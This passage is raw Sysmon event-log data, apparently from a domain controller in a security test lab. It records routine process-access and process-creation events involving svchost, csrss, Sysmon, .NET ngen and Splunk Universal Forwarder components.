13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006871Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006870Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006869Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006868Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006867Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006866Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006865Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9180-6005-AF02-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006864Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.858{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9180-6005-AF02-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006863Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.718{59A5CD1D-9180-6005-AF02-00000000A301}884C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006862Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.124{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9180-6005-AE02-00000000A301}4880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006861Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.108{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9180-6005-AE02-00000000A301}4880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006860Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:44.108{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9180-6005-AE02-00000000A301}4880C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006896Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.811{59A5CD1D-9181-6005-B102-00000000A301}48964204C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006895Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9181-6005-B102-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006894Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006893Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006892Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006891Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006890Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006889Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006888Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006887Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006886Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006885Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9181-6005-B102-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006884Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.671{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9181-6005-B102-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006883Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:45.531{59A5CD1D-9181-6005-B102-00000000A301}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 